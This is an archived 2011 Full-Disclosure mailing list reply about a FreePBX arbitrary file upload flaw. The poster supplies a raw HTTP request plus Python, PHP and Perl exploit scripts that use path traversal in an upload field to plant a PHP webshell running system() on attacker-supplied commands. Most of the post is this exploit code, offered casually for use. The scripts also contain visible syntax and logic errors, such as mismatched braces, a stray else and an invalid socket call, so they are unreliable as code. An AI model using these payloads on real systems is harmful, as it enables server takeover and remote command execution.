lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <BANLkTin86mGs0HiT31o_3BaQ5CMUoMfZ5Q@mail.gmail.com>
Date: Fri, 10 Jun 2011 08:59:40 +1000
From: "-= Glowing Doom =-" <secn3t@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: FreePBX - Module Administration Arbitrary
	File Upload

Hello...
I wrote a PoC code, for similar bug in this application, about 3months
ago... unfortunately, i did not bother to put it on here because well, it
was nothing much.. but since this 'admin' module has appeared, i will add my
codes to the thing...: this needs for PBX to 'record' ,notsure if an admin
module is needed..it seems to ONLY look for the recordings... anyhow have
fun.. admin i believe :)... nice try to find the sploit guys, i have only
posted it on my blogs and pastebin about 400times in the past 4months... i
guess i will put it here next time.. here is some codes for you..:
-------------------------------------------------------------------------------------------------------
PoC
The HTTP request below illustrates the upload of a phpshell::

POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
boundary=---------------------------5991806838789183981588991120
Content-Length: 116089

-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="display"

recordings
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="action"

recordings_start
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"

../../../../../var/www/html/admin/SpiderLabs
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream
<?php
/* WebShell code goes here */
?>
-----------------------------5991806838789183981588991120--

OK SO...

In python form:
#!/usr/bin/env python
import urllib, re, os, httplib, urllib2, time, socket, getopt, sys

host = $host
port = 80

s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
s.connectHTTP((host,port))
s.send(
'POST /admin/config.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-us,en;q=0.5\r\n'
'Accept-Encoding: gzip,deflate\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
'Keep-Alive: 300\r\n'
'Proxy-Connection: keep-alive\r\n'
'Referer: http://' + host + '/admin/config.php\r\n'
'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
'Authorization: Basic base64auth\r\n')
'Content-Type: multipart/form-data;\r\n'
'boundary=---------------------------5991806838789183981588991120\r\n'
'Content-Type: multipart/form-data;\r\n'
'boundary=---------------------------5991806838789183981588991120\r\n'
'Content-Length: 116089\r\n'
'\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="display"\r\n'
'\r\n'
'recordings\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="action"\r\n'
'\r\n'
'recordings_start\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="usersnum"\r\n'
'\r\n'
'../../../../../var/www/html/admin/zmeu.php\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'-----------------------------5991806838789183981588991120--\r\n'

and...

IN php:

<?php
    echo "\n\n";
    echo
"+-------------------------------------------------------------------------+\r\n";
    echo "|        FreePBX 2o11 Remote File Upload Exploit    |\r\n";
    echo "|        Usage: php exploit.php site.com                 |\r\n";
    echo
"+-------------------------------------------------------------------------+\r\n";
    echo "\n";
    echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
    $code = trim(fgets(STDIN));
    $socket = @fsockopen($argv[1], 80, $eno, $estr, 10);
    if(!$socket) {
    die("[-] Couldnt connect to: ".$argv[1].". Operation aborted.");
    }
    $part1      =   "POST /admin/config.php HTTP/1.1\r\n";
    $part1     .=   "Host: " . $argv[1] . "\r\n";
    $part1     .=   "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
10.4.6)\r\n";
    $part1     .=   "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $part1     .=   "Accept-Language: en-us,en;q=0.5\r\n";
    $part1     .=   "Accept-Encoding: gzip,deflate\r\n";
    $part1     .=   "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $part1     .=   "Connection: keep-alive\r\n";
    $part1     .=   "Keep-Alive: 300\r\n";
    $part1     .=   "Proxy-Connection: keep-alive\r\n";
    $part1     .=   "Referer: http://10.1.1.1/admin/config.php\r\n";
    $part1     .=   "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
    $part1     .=   "Authorization: Basic base64auth\r\n";
    $part1     .=   "Content-Type : multipart/form-data;\r\n";
    $part2      =
"boundary=-----------------------------5991806838789183981588991120--\r\n";
    $part1     .=   "Content-Type : multipart/form-data;\r\n";
    $part2      =
"boundary=-----------------------------5991806838789183981588991120--\r\n";
    $part2      =   "Content-Length: 116089\r\n";
    $part2     .=   "\r\n";
    $part2     .=
"-----------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"display\"\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "recordings\r\n";
    $part2     .=
"---------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"action\"\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "recordings_start\r\n";
    $part2     .=
"---------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"usersnum\"\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "Content-Disposition: form-data;
name=\"../../../../../var/www/html/admin/xd\"\r\n";
    $part2     .=
"---------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"ivrfile\";
filename=\"shell.php\"\r\n";
    $part2     .=   "Content-Type: application/octet-stream\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "<?php echo \'<pre>\' + system(\'$code\') + \'</pre>\';
?>\r\n";
    $part2     .=
"-----------------------------5991806838789183981588991120--\r\n";
    $part1     .=   $part2;
    fwrite($socket, $part1);
    echo "[!] Check the upload folder (/var/www/html/admin/xd) ..";
    } else {
    echo "\n\n";
    echo "+---------------------------------------------------+\r\n";
    echo "|      Usage: php exploit.php site.com  |\r\n";
    echo "+---------------------------------------------------+\r\n";
    echo "\n\n";
}
?>

and in perl..

#!/usr/bin/perl
use IO::Socket::INET;
use Crypt::SSLeay;
use Net::SSL;

sub usage {
print "perl $0 <Host> <Cmd>\n";
exit(1);
}
my($host, $cmd) = @ARGV or usage();
print "[+] Connecting to host...\n";
my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort
=> 80,Timeout => 10) or die "[-] Connect error..\n";
if(!sock) {
print "[-] Non-SSL PBX NOT HERE!\n";
exit(-1);
else {
$sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort =>
443,Timeout => 10) or die "[-] Connect error..\n";
print "[-] SSL PBX NOT HERE!\n";
exit(-1);
}
print "[+] Connected.. Sending Buffer\n";
my $temp=
"POST /admin/config.php HTTP/1.1\n".
"Host: $host:80/\n".
"User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n".
"Accept-Language: en-us,en;q=0.5\n".
"Accept-Encoding: gzip,deflate\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n".
"Keep-Alive: 300\n".
"Proxy-Connection: keep-alive\n".
"Referer: http://$host/admin/config.php\n".
"Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n".
"Authorization: Basic base64auth\n".
"Connection: keep-alive\n".
"Content-Type : multipart/form-data;\n".
"---------------------------5991806838789183981588991120\n".
"Content-Length: 116089\n".
"\n".
"Content-Disposition: form-data; name=\"display\"\n".
"recordings\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data; name=\"action\"\n".
"recordings_start\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data; name=\"usersnum\"\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data;
name=\"../../../../../var/www/html/admin/xd\"\n".
"Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n".
"Content-Type: application/octet-stream\n".
"\n".
"<?php ". $cmd ." ?>\n".
"-----------------------------5991806838789183981588991120--\n\n";

print "[+] Sent file 'shell.php' to act as webshell ..\n";
my $buffer_size=length($temp);
$temp;
my $answer=0;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock) {
print "[+] Buffer sent..running command: $cmd ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[!] Server reply: $answer ..\n";
}
}
}

have fun! Perl one is abit rough..
dru

xd @ #haxNET @ Efnet

(National LULZ day is here!)

And for those guys who 'exploited' it... this PoC was released like 3months
ago... what the hell are yu guiys on about, and where is even a HEADER
showing explotation :S seems you have started a group but forgot to check
this for previous bugs :) hehe... nomatter, it is now debugged for you.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ